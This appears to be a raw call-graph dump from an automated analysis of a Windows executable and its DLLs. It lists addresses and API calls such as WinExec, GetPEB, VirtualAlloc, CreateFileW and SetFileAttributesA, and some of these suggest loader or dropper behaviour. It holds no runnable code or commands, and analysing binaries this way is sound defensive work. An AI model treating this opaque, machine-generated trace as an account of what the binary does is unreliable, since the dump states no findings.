71005 2114d _initterm 71003->71005 71005->71006 71007 211be 71006->71007 71010 211b6 _register_thread_local_exe_atexit_callback 71006->71010 71019 216eb memset GetStartupInfoW 71007->71019 71009 211c3 _get_narrow_winmain_command_line 71020 21c50 GetCommandLineW CommandLineToArgvW 71009->71020 71010->71007 71012 211d8 71032 21721 GetModuleHandleW 71012->71032 71014 211df 71014->71000 71015 211e3 71014->71015 71016 211e7 _cexit 71015->71016 71017 211ec ___scrt_uninitialize_crt 71015->71017 71016->71017 71017->71004 71018->70999 71019->71009 71021 21c82 71020->71021 71022 21c78 71020->71022 71034 21d6f 71021->71034 71022->71012 71024 21ca0 71025 21d1c LocalFree 71024->71025 71026 21cc1 WideCharToMultiByte 71024->71026 71044 21000 TCGamerUpdateMain 71025->71044 71028 21d6f 4 API calls 71026->71028 71029 21ce1 WideCharToMultiByte 71028->71029 71029->71026 71030 21d14 71029->71030 71030->71025 71031 21d35 71031->71012 71032->71014 71033->71000 71035 21d7d 71034->71035 71036 21d8f malloc 71035->71036 71037 21d82 _callnewh 71036->71037 71038 21d9c 71036->71038 71037->71036 71040 21d9e 71037->71040 71038->71024 71039 21e9f 71041 21ead _CxxThrowException 71039->71041 71040->71039 71042 21e90 _CxxThrowException 71040->71042 71043 21ec3 71041->71043 71042->71039 71043->71024 71044->71031 71045 6c38403b 71050 6c384049 error_info_injector 71045->71050 71046 6c384d58 71047 6c393a5e 29 API calls 71046->71047 71048 6c384d5d 71047->71048 71078 6c3726c0 30 API calls 3 library calls 71048->71078 71050->71046 71052 6c38416b WinExec 71050->71052 71051 6c384d69 71079 6c3726c0 30 API calls 3 library calls 71051->71079 71055 6c38aa0e 3 API calls 71052->71055 71054 6c384d75 71080 6c3726c0 30 API calls 3 library calls 71054->71080 71057 6c384197 71055->71057 71076 6c385e30 30 API calls 2 library calls 71057->71076 71058 6c384d81 71081 6c3726c0 30 API calls 3 library calls 71058->71081 71061 6c384d8d 71082 6c3726c0 30 API calls 3 library calls 71061->71082 71063 6c384d99 71083 6c3726c0 30 API calls 3 library calls 71063->71083 71064 6c384204 71064->71046 71077 6c37b390 30 API calls 2 library calls 71064->71077 71067 6c384da5 71084 6c3726c0 30 API calls 3 library calls 71067->71084 71069 6c384db1 71085 6c3726c0 30 API calls 3 library calls 71069->71085 71071 6c384dbd 71086 6c3726c0 30 API calls 3 library calls 71071->71086 71073 6c384dc9 71087 6c3726c0 30 API calls 3 library calls 71073->71087 71075 6c384dd5 71076->71064 71077->71064 71078->71051 71079->71054 71080->71058 71081->71061 71082->71063 71083->71067 71084->71069 71085->71071 71086->71073 71087->71075 71088 910032 71098 910ae4 GetPEB 71088->71098 71090 91029b 71091 910ae4 GetPEB 71090->71091 71094 9102a7 71091->71094 71092 9104a6 GetNativeSystemInfo 71093 9104d3 VirtualAlloc 71092->71093 71096 910a02 71092->71096 71095 9104ec 71093->71095 71094->71092 71094->71096 71095->71095 71100 10007813 71095->71100 71099 910b00 71098->71099 71099->71090 71099->71099 71101 10007823 71100->71101 71102 1000781e 71100->71102 71106 1000771d 71101->71106 71114 1000b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 71102->71114 71105 10007831 71105->71096 71107 10007729 __lseeki64 71106->71107 71108 100077c6 __lseeki64 71107->71108 71112 10007776 71107->71112 71115 100075b9 71107->71115 71108->71105 71110 100077a6 71110->71108 71111 100075b9 __CRT_INIT@12 149 API calls 71110->71111 71111->71108 71112->71108 71112->71110 71113 100075b9 __CRT_INIT@12 149 API calls 71112->71113 71113->71110 71114->71101 71116 100075c5 __lseeki64 71115->71116 71117 10007647 71116->71117 71118 100075cd 71116->71118 71120 100076a8 71117->71120 71121 1000764d 71117->71121 71166 1000803b HeapCreate 71118->71166 71122 10007706 71120->71122 71123 100076ad 71120->71123 71130 1000766b 71121->71130 71133 100075d6 __lseeki64 71121->71133 71191 10008306 66 API calls _doexit 71121->71191 71122->71133 71197 10009a58 79 API calls __freefls@4 71122->71197 71125 10009754 ___set_flsgetvalue 3 API calls 71123->71125 71124 100075d2 71124->71133 71185 10009ac6 86 API calls 5 library calls 71124->71185 71127 100076b2 71125->71127 71134 10009fe4 __calloc_crt 66 API calls 71127->71134 71131 1000767f 71130->71131 71192 1000b0e4 67 API calls _free 71130->71192 71195 10007692 70 API calls __mtterm 71131->71195 71133->71112 71138 100076be 71134->71138 71135 100075e2 __RTC_Initialize 71139 100075e6 71135->71139 71145 100075f2 GetCommandLineA 71135->71145 71137 10007675 71193 100097a5 70 API calls _free 71137->71193 71138->71133 71141 100076ca DecodePointer 71138->71141 71186 10008059 HeapDestroy 71139->71186 71148 100076df 71141->71148 71143 100075eb 71143->71133 71144 1000767a 71194 10008059 HeapDestroy 71144->71194 71167 1000b468 71 API calls 2 library calls 71145->71167 71149 100076e3 71148->71149 71150 100076fa 71148->71150 71152 100097e2 __getptd_noexit 66 API calls 71149->71152 71196 10006e49 66 API calls 2 library calls 71150->71196 71151 10007602 71168 1000ae9f 73 API calls __calloc_crt 71151->71168 71155 100076ea GetCurrentThreadId 71152->71155 71155->71133 71156 1000760c 71157 10007610 71156->71157 71188 1000b3ad 95 API calls 3 library calls 71156->71188 71187 100097a5 70 API calls _free 71157->71187 71160 1000761c 71161 10007630 71160->71161 71169 1000b137 71160->71169 71161->71143 71190 1000b0e4 67 API calls _free 71161->71190 71166->71124 71167->71151 71168->71156 71170 1000b140 71169->71170 71172 1000b145 _strlen 71169->71172 71198 1000de61 94 API calls __setmbcp 71170->71198 71173 10009fe4 __calloc_crt 66 API calls 71172->71173 71177 10007625 71172->71177 71174 1000b17a _strlen 71173->71174 71175 1000b1c9 71174->71175 71174->71177 71178 10009fe4 __calloc_crt 66 API calls 71174->71178 71179 1000b1ef 71174->71179 71182 1000b206 71174->71182 71199 10007f48 66 API calls __wctomb_s_l 71174->71199 71200 10006e49 66 API calls 2 library calls 71175->71200 71177->71161 71189 10008119 77 API calls 4 library calls 71177->71189 71178->71174 71201 10006e49 66 API calls 2 library calls 71179->71201 71202 100086b0 10 API calls __call_reportfault 71182->71202 71184 1000b212 71185->71135 71186->71143 71187->71139 71188->71160 71189->71161 71190->71157 71191->71130 71192->71137 71193->71144 71194->71131 71195->71133 71196->71133 71197->71133 71198->71172 71199->71174 71200->71177 71201->71177 71202->71184 71203 6c3a0bfe CreateFileW 71204 6c383d3e 71205 6c38aa0e 3 API calls 71204->71205 71206 6c383d47 _Yarn 71205->71206 71238 6c381070 71206->71238 71208 6c383df7 Sleep 71209 6c38aa0e 3 API calls 71208->71209 71212 6c383e2e 71209->71212 71210 6c384d58 71213 6c393a5e 29 API calls 71210->71213 71211 6c383daa error_info_injector 71211->71208 71211->71210 71250 6c385e30 30 API calls 2 library calls 71212->71250 71215 6c384d5d 71213->71215 71252 6c3726c0 30 API calls 3 library calls 71215->71252 71217 6c384d69 71253 6c3726c0 30 API calls 3 library calls 71217->71253 71218 6c383eba 71218->71210 71251 6c37b390 30 API calls 2 library calls 71218->71251 71220 6c384d75 71254 6c3726c0 30 API calls 3 library calls 71220->71254 71223 6c384d81 71255 6c3726c0 30 API calls 3 library calls 71223->71255 71225 6c384d8d 71256 6c3726c0 30 API calls 3 library calls 71225->71256 71227 6c384d99 71257 6c3726c0 30 API calls 3 library calls 71227->71257 71229 6c384da5 71258 6c3726c0 30 API calls 3 library calls 71229->71258 71231 6c384db1 71259 6c3726c0 30 API calls 3 library calls 71231->71259 71233 6c384dbd 71260 6c3726c0 30 API calls 3 library calls 71233->71260 71235 6c384dc9 71261 6c3726c0 30 API calls 3 library calls 71235->71261 71237 6c384dd5 71239 6c381076 71238->71239 71262 6c37b880 71239->71262 71241 6c3810d5 71242 6c38112f 71241->71242 71281 6c3811c0 71241->71281 71307 6c37a100 71242->71307 71244 6c38114d std::ios_base::_Ios_base_dtor 71244->71211 71250->71218 71251->71218 71252->71217 71253->71220 71254->71223 71255->71225 71256->71227 71257->71229 71258->71231 71259->71233 71260->71235 71261->71237 71263 6c37b8b5 71262->71263 71313 6c37bd70 71263->71313 71265 6c37b951 71266 6c38aa0e 3 API calls 71265->71266 71267 6c37b989 71266->71267 71330 6c38b2cf 71267->71330 71269 6c37b99d 71342 6c37bb60 71269->71342 71272 6c37ba92 71272->71241 71274 6c37bad1 71351 6c3726d0 30 API calls 3 library calls 71274->71351 71276 6c37bae3 71352 6c38d2b3 RaiseException 71276->71352 71278 6c37baf8 71279 6c37a100 72 API calls 71278->71279 71280 6c37bb0f 71279->71280 71280->71241 71282 6c3811ff 71281->71282 71283 6c381213 71282->71283 71748 6c372060 39 API calls Concurrency::cancel_current_task 71282->71748 71285 6c3812d9 71283->71285 71750 6c372300 38 API calls 71283->71750 71751 6c3726d0 30 API calls 3 library calls 71283->71751 71752 6c38d2b3 RaiseException 71283->71752 71288 6c38110f 71285->71288 71749 6c372d90 39 API calls Concurrency::cancel_current_task 71285->71749 71291 6c3798c0 71288->71291 71292 6c3798d9 71291->71292 71301 6c379909 71291->71301 71753 6c37b030 71292->71753 71294 6c3799cd 71759 6c38aa82 71294->71759 71296 6c3799df 71766 6c372300 38 API calls 71296->71766 71298 6c394007 69 API calls 71298->71301 71299 6c3799d8 SetFileAttributesA 71299->71242 71301->71294 71301->71296 71302 6c379a07 71767 6c372370 30 API calls 71302->71767 71304 6c379a17 71768 6c38d2b3 RaiseException 71304->71768 71306 6c379a22 71308 6c37a13b 71307->71308 71309 6c37a193 71308->71309 71310 6c37b030 69 API calls 71308->71310 71309->71244 71311 6c37a188 71310->71311 71312 6c394007 69 API calls 71311->71312 71312->71309 71314 6c38aa0e 3 API calls 71313->71314 71315 6c37bdce 71314->71315 71316 6c38b2cf 44 API calls 71315->71316 71317 6c37bde2 71316->71317 71353 6c374ca0 67 API calls 3 library calls 71317->71353 71319 6c37be18 71320 6c37be64 71319->71320 71321 6c37be8d 71319->71321 71322 6c37be77 71320->71322 71354 6c38af37 9 API calls 2 library calls 71320->71354 71355 6c372300 38 API calls 71321->71355 71322->71265 71325 6c37beb7 71356 6c372370 30 API calls 71325->71356 71327 6c37becd 71357 6c38d2b3 RaiseException 71327->71357 71329 6c37bed8 71329->71265 71331 6c38b2db __EH_prolog3 71330->71331 71358 6c38ae5e 71331->71358 71336 6c38b2f9 71372 6c38b362 41 API calls std::locale::_Setgloballocale 71336->71372 71337 6c38b317 71364 6c38ae8f 71337->71364 71338 6c38b354 __DllMainCRTStartup@12 71338->71269 71340 6c38b301 71373 6c38b159 14 API calls 3 library calls 71340->71373 71343 6c37bbac 71342->71343 71349 6c37ba46 71342->71349 71378 6c38b3ef 71343->71378 71347 6c37bc52 71387 6c37b4e0 67 API calls 2 library calls 71347->71387 71349->71272 71350 6c372300 38 API calls 71349->71350 71350->71274 71351->71276 71352->71278 71353->71319 71354->71322 71355->71325 71356->71327 71357->71329 71359 6c38ae6d 71358->71359 71360 6c38ae74 71358->71360 71374 6c393d74 6 API calls std::_Lockit::_Lockit 71359->71374 71362 6c38ae72 71360->71362 71375 6c38c9db EnterCriticalSection 71360->71375 71362->71337 71371 6c38b1d8 15 API calls std::locale::_Locimp::_Locimp 71362->71371 71365 6c38ae99 71364->71365 71366 6c393d82 71364->71366 71367 6c38aeac 71365->71367 71376 6c38c9e9 LeaveCriticalSection 71365->71376 71377 6c393d5d LeaveCriticalSection 71366->71377 71367->71338 71370 6c393d89 71370->71338 71371->71336 71372->71340 71373->71337 71374->71362 71375->71362 71376->71367 71377->71370 71379 6c38b3f8 71378->71379 71380 6c37bbba 71379->71380 71388 6c393311 71379->71388 71380->71349 71386 6c390063 29 API calls 2 library calls 71380->71386 71384 6c38b467 71384->71380 71411 6c394007 71384->71411 71386->71347 71387->71349 71389 6c39331c ___scrt_is_nonwritable_in_current_image 71388->71389 71390 6c39332f 71389->71390 71393 6c39334f 71389->71393 71429 6c392f04 14 API calls __dosmaperr 71390->71429 71392 6c393334 71430 6c393a4e 29 API calls __wsopen_s 71392->71430 71395 6c393361 71393->71395 71396 6c393354 71393->71396 71415 6c3a0537 71395->71415 71431 6c392f04 14 API calls __dosmaperr 71396->71431 71397 6c38b44c 71397->71380 71407 6c392fb4 71397->71407 71401 6c39337e 71423 6c3a069d 71401->71423 71402 6c393371 71432 6c392f04 14 API calls __dosmaperr 71402->71432 71408 6c392fc7 __wsopen_s 71407->71408 71572 6c393267 71408->71572 71410 6c392fdc __wsopen_s 71410->71384 71412 6c39401a __wsopen_s 71411->71412 71682 6c3940c5 71412->71682 71414 6c394026 __wsopen_s 71414->71380 71416 6c3a0543 ___scrt_is_nonwritable_in_current_image 71415->71416 71434 6c393d46 EnterCriticalSection 71416->71434 71418 6c3a0551 71435 6c3a05db 71418->71435 71424 6c3a07bc 71423->71424 71466 6c3a083f 71424->71466 71427 6c393393 71433 6c3933bc LeaveCriticalSection __fread_nolock 71427->71433 71429->71392 71430->71397 71431->71397 71432->71397 71433->71397 71434->71418 71442 6c3a05fe 71435->71442 71436 6c3a0656 71453 6c39cf6f 71436->71453 71441 6c3a0668 71447 6c3a055e 71441->71447 71461 6c39ca3e 6 API calls std::_Lockit::_Lockit 71441->71461 71442->71436 71442->71442 71442->71447 71451 6c3900a9 EnterCriticalSection 71442->71451 71452 6c3900bd LeaveCriticalSection 71442->71452 71444 6c3a0687 71462 6c3900a9 EnterCriticalSection 71444->71462 71448 6c3a0597 71447->71448 71465 6c393d5d LeaveCriticalSection 71448->71465 71450 6c39336a 71450->71401 71450->71402 71451->71442 71452->71442 71459 6c39cf7c __dosmaperr 71453->71459 71454 6c39cfbc 71464 6c392f04 14 API calls __dosmaperr 71454->71464 71455 6c39cfa7 RtlAllocateHeap 71457 6c39cfba 71455->71457 71455->71459 71460 6c39a607 14 API calls __dosmaperr 71457->71460 71459->71454 71459->71455 71463 6c3924cf EnterCriticalSection LeaveCriticalSection __dosmaperr 71459->71463 71460->71441 71461->71444 71462->71447 71463->71459 71464->71457 71465->71450 71467 6c3a085e 71466->71467 71468 6c3a0871 71467->71468 71475 6c3a0886 71467->71475 71486 6c392f04 14 API calls __dosmaperr 71468->71486 71470 6c3a0876 71487 6c393a4e 29 API calls __wsopen_s 71470->71487 71472 6c3a07d2 71472->71427 71483 6c3a9b59 71472->71483 71474 6c3a0a57 71492 6c393a4e 29 API calls __wsopen_s 71474->71492 71481 6c3a09a6 71475->71481 71488 6c3a9a21 39 API calls 2 library calls 71475->71488 71478 6c3a09f6 71478->71481 71489 6c3a9a21 39 API calls 2 library calls 71478->71489 71480 6c3a0a14 71480->71481 71490 6c3a9a21 39 API calls 2 library calls 71480->71490 71481->71472 71491 6c392f04 14 API calls __dosmaperr 71481->71491 71493 6c3a9f11 71483->71493 71486->71470 71487->71472 71488->71478 71489->71480 71490->71481 71491->71474 71492->71472 71495 6c3a9f1d ___scrt_is_nonwritable_in_current_image 71493->71495 71494 6c3a9f24 71513 6c392f04 14 API calls __dosmaperr 71494->71513 71495->71494 71497 6c3a9f4f 71495->71497 71504 6c3a9b79 71497->71504 71498 6c3a9f29 71514 6c393a4e 29 API calls __wsopen_s 71498->71514 71503 6c3a9b74 71503->71427 71516 6c3951ef 71504->71516 71509 6c3a9baf 71512 6c3a9be1 71509->71512 71571 6c39a607 14 API calls __dosmaperr 71509->71571 71515 6c3a9fa6 LeaveCriticalSection __wsopen_s 71512->71515 71513->71498 71514->71503 71515->71503 71517 6c38f6fa __wsopen_s 39 API calls 71516->71517 71518 6c395201 71517->71518 71519 6c39c851 __wsopen_s 5 API calls 71518->71519 71520 6c395213 71518->71520 71519->71520 71521 6c38f7f4 71520->71521 71522 6c38f869 __wsopen_s 17 API calls 71521->71522 71523 6c38f80c 71522->71523 71523->71509 71524 6c3a9be7 71523->71524 71525 6c3aa081 __wsopen_s 29 API calls 71524->71525 71526 6c3a9c04 71525->71526 71527 6c3a9c19 71526->71527 71528 6c3a9c32 71526->71528 71529 6c392f17 __dosmaperr 14 API calls 71527->71529 71530 6c3a6ded __wsopen_s 18 API calls 71528->71530 71532 6c3a9c1e 71529->71532 71531 6c3a9c37 71530->71531 71533 6c3a9c40 71531->71533 71534 6c3a9c57 71531->71534 71535 6c392f04 __dosmaperr 14 API calls 71532->71535 71536 6c392f17 __dosmaperr 14 API calls 71533->71536 71537 6c3a9fec __wsopen_s CreateFileW 71534->71537 71538 6c3a9c2b 71535->71538 71539 6c3a9c45 71536->71539 71545 6c3a9c90 71537->71545 71538->71509 71541 6c392f04 __dosmaperr 14 API calls 71539->71541 71540 6c3a9d0d GetFileType 71543 6c3a9d18 GetLastError 71540->71543 71544 6c3a9d5f 71540->71544 71541->71532 71542 6c3a9ce2 GetLastError 71546 6c392f2a __dosmaperr 14 API calls 71542->71546 71545->71540 71545->71542 71548 6c3a9fec __wsopen_s CreateFileW 71545->71548 71546->71532 71551 6c3a9cd5 71548->71551 71551->71540 71551->71542 71571->71512 71574 6c393273 ___scrt_is_nonwritable_in_current_image 71572->71574 71573 6c393279 71595 6c393bf7 29 API calls 2 library calls 71573->71595 71574->71573 71577 6c3932bc 71574->71577 71576 6c393294 71576->71410 71583 6c3900a9 EnterCriticalSection 71577->71583 71579 6c3932c8 71584 6c39317b 71579->71584 71581 6c3932de 71596 6c393307 LeaveCriticalSection __fread_nolock 71581->71596 71583->71579 71585 6c39318e 71584->71585 71586 6c3931a1 71584->71586 71585->71581 71597 6c3930a2 71586->71597 71588 6c3931c4 71591 6c3931df 71588->71591 71594 6c393252 71588->71594 71610 6c39ff35 34 API calls 3 library calls 71588->71610 71601 6c39421d 71591->71601 71594->71581 71595->71576 71596->71576 71598 6c39310b 71597->71598 71599 6c3930b3 71597->71599 71598->71588 71599->71598 71611 6c39fcdb 31 API calls 2 library calls 71599->71611 71602 6c394236 71601->71602 71606 6c3931f2 71601->71606 71602->71606 71612 6c39f3a2 71602->71612 71604 6c394252 71619 6c3a1438 71604->71619 71607 6c39fd1b 71606->71607 71663 6c39fe7c 71607->71663 71609 6c39fd34 71609->71594 71610->71591 71611->71598 71613 6c39f3ae 71612->71613 71614 6c39f3c3 71612->71614 71630 6c392f04 14 API calls __dosmaperr 71613->71630 71614->71604 71616 6c39f3b3 71631 6c393a4e 29 API calls __wsopen_s 71616->71631 71618 6c39f3be 71618->71604 71620 6c3a1444 ___scrt_is_nonwritable_in_current_image 71619->71620 71621 6c3a1485 71620->71621 71622 6c3a14cb 71620->71622 71629 6c3a144c 71620->71629 71661 6c393bf7 29 API calls 2 library calls 71621->71661 71632 6c3a7171 EnterCriticalSection 71622->71632 71625 6c3a14d1 71626 6c3a14ef 71625->71626 71633 6c3a121c 71625->71633 71662 6c3a1541 LeaveCriticalSection __wsopen_s 71626->71662 71629->71606 71630->71616 71631->71618 71632->71625 71634 6c3a1244 71633->71634 71659 6c3a1267 __wsopen_s 71633->71659 71635 6c3a1248 71634->71635 71637 6c3a12a3 71634->71637 71636 6c393bf7 __wsopen_s 29 API calls 71635->71636 71636->71659 71638 6c3a12c1 71637->71638 71640 6c39fd1b __wsopen_s 31 API calls 71637->71640 71639 6c3a1549 __wsopen_s 40 API calls 71638->71639 71641 6c3a12d3 71639->71641 71640->71638 71642 6c3a12d9 71641->71642 71643 6c3a1320 71641->71643 71644 6c3a1308 71642->71644 71645 6c3a12e1 71642->71645 71646 6c3a1389 WriteFile 71643->71646 71647 6c3a1334 71643->71647 71648 6c3a15c6 __wsopen_s 45 API calls 71644->71648 71652 6c3a198d __wsopen_s 6 API calls 71645->71652 71645->71659 71649 6c3a13ab GetLastError 71646->71649 71646->71659 71650 6c3a133c 71647->71650 71651 6c3a1375 71647->71651 71654 6c3a131b 71648->71654 71649->71659 71655 6c3a1361 71650->71655 71656 6c3a1341 71650->71656 71653 6c3a19f5 __wsopen_s 7 API calls 71651->71653 71652->71659 71653->71659 71654->71659 71658 6c3a1bb9 __wsopen_s 8 API calls 71655->71658 71657 6c3a134a 71656->71657 71656->71659 71660 6c3a1ad0 __wsopen_s 7 API calls 71657->71660 71658->71654 71659->71626 71660->71659 71661->71629 71662->71629 71669 6c3a6d83 71663->71669 71665 6c39fe8e 71666 6c39feaa SetFilePointerEx 71665->71666 71667 6c39fe96 __wsopen_s 71665->71667 71666->71667 71668 6c39fec2 GetLastError 71666->71668 71667->71609 71668->71667 71670 6c3a6d90 71669->71670 71671 6c3a6da5 71669->71671 71672 6c392f17 __dosmaperr 14 API calls 71670->71672 71673 6c392f17 __dosmaperr 14 API calls 71671->71673 71676 6c3a6dca 71671->71676 71674 6c3a6d95 71672->71674 71677 6c3a6dd5 71673->71677 71675 6c392f04 __dosmaperr 14 API calls 71674->71675 71679 6c3a6d9d 71675->71679 71676->71665 71678 6c392f04 __dosmaperr 14 API calls 71677->71678 71680 6c3a6ddd 71678->71680 71679->71665 71681 6c393a4e __wsopen_s 29 API calls 71680->71681 71681->71679 71683 6c3940d1 ___scrt_is_nonwritable_in_current_image 71682->71683 71684 6c3940db 71683->71684 71685 6c3940fe 71683->71685 71708 6c393bf7 29 API calls 2 library calls 71684->71708 71686 6c3940f6 71685->71686 71693 6c3900a9 EnterCriticalSection 71685->71693 71686->71414 71689 6c39411c 71694 6c394037 71689->71694 71691 6c394129 71709 6c394154 LeaveCriticalSection __fread_nolock 71691->71709 71693->71689 71695 6c394044 71694->71695 71697 6c394067 71694->71697 71721 6c393bf7 29 API calls 2 library calls 71695->71721 71698 6c39405f 71697->71698 71699 6c39421d ___scrt_uninitialize_crt 64 API calls 71697->71699 71698->71691 71700 6c39407f 71699->71700 71710 6c39e56c 71700->71710 71703 6c39f3a2 __fread_nolock 29 API calls 71704 6c394093 71703->71704 71714 6c3a0f92 71704->71714 71708->71686 71709->71686 71711 6c394087 71710->71711 71712 6c39e583 71710->71712 71711->71703 71712->71711 71723 6c39a607 14 API calls __dosmaperr 71712->71723 71715 6c3a0fbb 71714->71715 71716 6c39409a 71714->71716 71717 6c3a100a 71715->71717 71719 6c3a0fe2 71715->71719 71716->71698 71722 6c39a607 14 API calls __dosmaperr 71716->71722 71732 6c393bf7 29 API calls 2 library calls 71717->71732 71724 6c3a1035 71719->71724 71721->71698 71722->71698 71723->71711 71725 6c3a1041 ___scrt_is_nonwritable_in_current_image 71724->71725 71733 6c3a7171 EnterCriticalSection 71725->71733 71727 6c3a104f 71728 6c3a1080 71727->71728 71734 6c3a0ef2 71727->71734 71747 6c3a10ba LeaveCriticalSection __wsopen_s 71728->71747 71731 6c3a10a3 71731->71716 71732->71716 71733->71727 71735 6c3a6d83 __wsopen_s 29 API calls 71734->71735 71737 6c3a0f02 71735->71737 71736 6c3a0f08 71738 6c3a6f00 __wsopen_s 15 API calls 71736->71738 71737->71736 71739 6c3a0f3a 71737->71739 71741 6c3a6d83 __wsopen_s 29 API calls 71737->71741 71746 6c3a0f60 __wsopen_s 71738->71746 71739->71736 71740 6c3a6d83 __wsopen_s 29 API calls 71739->71740 71742 6c3a0f46 CloseHandle 71740->71742 71743 6c3a0f31 71741->71743 71742->71736 71745 6c3a0f52 GetLastError 71742->71745 71744 6c3a6d83 __wsopen_s 29 API calls 71743->71744 71744->71739 71745->71736 71746->71728 71747->71731 71748->71283 71749->71288 71750->71283 71751->71283 71752->71283 71754 6c37b09e 71753->71754 71757 6c37b04a 71753->71757 71755 6c38aa82 _ValidateLocalCookies 5 API calls 71754->71755 71756 6c3798ff 71755->71756 71756->71298 71757->71754 71769 6c394c68 71757->71769 71760 6c38aa8a 71759->71760 71761 6c38aa8b IsProcessorFeaturePresent 71759->71761 71760->71299 71763 6c38c407 71761->71763 71858 6c38c4ed SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 71763->71858 71765 6c38c4ea 71765->71299 71766->71302 71767->71304 71768->71306 71770 6c394c7b __wsopen_s 71769->71770 71773 6c394e49 71770->71773 71772 6c394c90 __wsopen_s 71772->71754 71774 6c394e7f 71773->71774 71775 6c394e57 71773->71775 71774->71772 71775->71774 71776 6c394e64 71775->71776 71777 6c394e86 71775->71777 71789 6c393bf7 29 API calls 2 library calls 71776->71789 71781 6c394f0c 71777->71781 71782 6c394f18 ___scrt_is_nonwritable_in_current_image 71781->71782 71790 6c3900a9 EnterCriticalSection 71782->71790 71784 6c394f26 71791 6c394ec0 71784->71791 71788 6c394ebe 71788->71772 71789->71774 71790->71784 71799 6c39e39a 71791->71799 71797 6c394f02 71798 6c394f5b LeaveCriticalSection __fread_nolock 71797->71798 71798->71788 71819 6c39e445 71799->71819 71801 6c39e3ab 71802 6c39e3fa 71801->71802 71803 6c394ed8 71801->71803 71826 6c39a641 15 API calls __dosmaperr 71802->71826 71808 6c394ca2 71803->71808 71805 6c39e404 71827 6c39a607 14 API calls __dosmaperr 71805->71827 71807 6c39e40d 71807->71803 71811 6c394cb4 71808->71811 71813 6c394cdd 71808->71813 71809 6c394cc2 71850 6c393bf7 29 API calls 2 library calls 71809->71850 71811->71809 71811->71813 71817 6c394cf8 _Yarn 71811->71817 71818 6c39e483 64 API calls ___scrt_uninitialize_crt 71813->71818 71814 6c39421d ___scrt_uninitialize_crt 64 API calls 71814->71817 71815 6c39f3a2 __fread_nolock 29 API calls 71815->71817 71816 6c3a1438 __wsopen_s 64 API calls 71816->71817 71817->71813 71817->71814 71817->71815 71817->71816 71837 6c3a1e85 71817->71837 71818->71797 71820 6c39e451 71819->71820 71821 6c39e47b 71820->71821 71822 6c39f3a2 __fread_nolock 29 API calls 71820->71822 71821->71801 71823 6c39e46c 71822->71823 71828 6c3a71c6 71823->71828 71825 6c39e472 71825->71801 71826->71805 71827->71807 71829 6c3a71d3 71828->71829 71830 6c3a71e0 71828->71830 71831 6c392f04 __dosmaperr 14 API calls 71829->71831 71832 6c3a71ec 71830->71832 71833 6c392f04 __dosmaperr 14 API calls 71830->71833 71834 6c3a71d8 71831->71834 71832->71825 71835 6c3a720d 71833->71835 71834->71825 71836 6c393a4e __wsopen_s 29 API calls 71835->71836 71836->71834 71838 6c3a1f15 71837->71838 71839 6c39f3a2 __fread_nolock 29 API calls 71838->71839 71842 6c3a1f22 71839->71842 71840 6c3a1f2e 71840->71817 71841 6c3a1f7a 71841->71840 71844 6c3a1fdc 71841->71844 71845 6c39e445 29 API calls 71841->71845 71842->71840 71842->71841 71856 6c3a1e90 31 API calls __wsopen_s 71842->71856 71857 6c3a200b 64 API calls 2 library calls 71844->71857 71847 6c3a1fcf 71845->71847 71847->71844 71851 6c3a3cff 71847->71851 71848 6c3a1fed 71848->71817 71850->71813 71852 6c39cf6f __dosmaperr 14 API calls 71851->71852 71853 6c3a3d1c 71852->71853 71854 6c39a607 ___free_lconv_mon 14 API calls 71853->71854 71855 6c3a3d26 71854->71855 71855->71844 71856->71841 71857->71848 71858->71765 71859 1001f927 71860 1001fb9a 71859->71860 71864 100060df 71 API calls 71860->71864 71865 10005ef8 71860->71865 71869 1001f997 71860->71869 71861 1001fb9c 71864->71861 71866 10005f68 71865->71866 71867 10001100 70 API calls 71866->71867 71868 1001f9b7 71866->71868 71867->71866 71870 10005f68 71869->71870 71871 10001100 70 API calls 71870->71871 71872 1001f9b7 71870->71872 71871->71870 71873 6c37a8b0 71874 6c37a930 _Yarn 71873->71874 71876 6c37a8cd _Yarn 71873->71876 71875 6c37aa4b 71875->71874 71879 6c394922 71875->71879 71876->71874 71876->71875 71877 6c394922 __fread_nolock 45 API calls 71876->71877 71877->71876 71882 6c394885 71879->71882 71883 6c394891 ___scrt_is_nonwritable_in_current_image 71882->71883 71884 6c3948db 71883->71884 71885 6c3948a4 __fread_nolock 71883->71885 71894 6c3948c9 71883->71894 71895 6c3900a9 EnterCriticalSection 71884->71895 71910 6c392f04 14 API calls __dosmaperr 71885->71910 71888 6c3948e5 71896 6c39493f 71888->71896 71889 6c3948be 71911 6c393a4e 29 API calls __wsopen_s 71889->71911 71894->71874 71895->71888 71899 6c394951 __fread_nolock 71896->71899 71903 6c3948fc 71896->71903 71897 6c39495e 71934 6c392f04 14 API calls __dosmaperr 71897->71934 71899->71897 71899->71903 71905 6c3949af 71899->71905 71900 6c394963 71935 6c393a4e 29 API calls __wsopen_s 71900->71935 71912 6c39491a LeaveCriticalSection __fread_nolock 71903->71912 71904 6c394ada __fread_nolock 72004 6c392f04 14 API calls __dosmaperr 71904->72004 71905->71903 71905->71904 71907 6c39f3a2 __fread_nolock 29 API calls 71905->71907 71913 6c3a1ceb 71905->71913 71936 6c394804 29 API calls 4 library calls 71905->71936 71937 6c3a21f6 71905->71937 71907->71905 71910->71889 71911->71894 71912->71894 71914 6c3a1cf6 71913->71914 71915 6c3a1d03 71914->71915 71918 6c3a1d1b 71914->71918 72035 6c392f04 14 API calls __dosmaperr 71915->72035 71917 6c3a1d08 72036 6c393a4e 29 API calls __wsopen_s 71917->72036 71920 6c3a1d7a 71918->71920 71921 6c3a1d13 71918->71921 71922 6c3a3cff __fread_nolock 14 API calls 71918->71922 71923 6c39f3a2 __fread_nolock 29 API calls 71920->71923 71921->71905 71922->71920 71924 6c3a1d93 71923->71924 72005 6c3a20dd 71924->72005 71927 6c39f3a2 __fread_nolock 29 API calls 71928 6c3a1dcc 71927->71928 71928->71921 71929 6c39f3a2 __fread_nolock 29 API calls 71928->71929 71930 6c3a1dda 71929->71930 71930->71921 71931 6c39f3a2 __fread_nolock 29 API calls 71930->71931 71932 6c3a1de8 71931->71932 71933 6c39f3a2 __fread_nolock 29 API calls 71932->71933 71933->71921 71934->71900 71935->71903 71936->71905 71938 6c3a2208 71937->71938 71939 6c3a2220 71937->71939 72048 6c392f17 14 API calls __dosmaperr 71938->72048 71940 6c3a2562 71939->71940 71946 6c3a2263 71939->71946 72067 6c392f17 14 API calls __dosmaperr 71940->72067 71943 6c3a220d 72049 6c392f04 14 API calls 